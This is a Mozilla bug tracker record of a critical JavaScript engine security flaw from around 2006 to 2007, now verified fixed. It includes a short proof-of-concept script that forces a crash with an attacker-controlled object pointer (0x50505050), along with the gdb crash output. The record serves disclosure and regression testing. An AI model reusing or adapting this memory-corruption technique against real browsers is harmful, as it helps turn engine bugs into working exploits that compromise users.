Closed Bug 364023 Opened 18 years ago Closed 18 years ago

LITOPX DEFFUN is exploitable

Categories

(Core :: JavaScript Engine, defect)

Product:
Core
Component:
JavaScript Engine
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: sync2d, Assigned: sync2d)

Details

(Keywords: crash, verified1.8.0.10, verified1.8.1.2, Whiteboard: [sg:critical] security tracker for bug 363988)

Attachments

(1 file)

js1_5/Function/regress-364023.js
2.55 KB, text/plain
Details
$ cat litopx-deffun-x.txt function exploit() { var code = ""; for(var i = 0; i < 0x10000; i++) { if(i == 125) { code += "void 0x10000050505050;\n"; } else { code += "void " + (0x10000000000000 + i) + ";\n"; } } code += "function foo() {}\n"; eval(code); } exploit(); $ gdb --eval run --args dbg.obj/js litopx-deffun-x.txt ... Program received signal SIGSEGV, Segmentation fault. 0x00432d3d in JS_GetPrivate (cx=0xb50750, obj=0x131c620) at jsapi.c:2298 2298 JS_ASSERT(OBJ_GET_CLASS(cx, obj)->flags & JSCLASS_HAS_PRIVATE); (gdb) print *obj $1 = {map = 0x50505050, fslots = {1127219200, 126, 1127219200, 127, 1127219200, 128}, dslots = 0x43300000} In other words, bug 363988 is exploitable.
Flags: blocking1.8.1.2+
Flags: blocking1.8.0.10+
Whiteboard: [sg:critical] security tracker for bug 363988
shutdown contributed a patch for bug 363988
Assignee: general → shutdown
Fix landed for bug 363988. /be
Status: NEW → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED
Flags: in-testsuite+
verified fixed 1.8.0, 1.8.1, 1.9.0 2007-01-23 win/mac*/linux
Status: RESOLVED → VERIFIED
Group: security
/cvsroot/mozilla/js/tests/js1_5/Function/regress-364023.js,v <-- regress-364023.js initial revision: 1.1
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: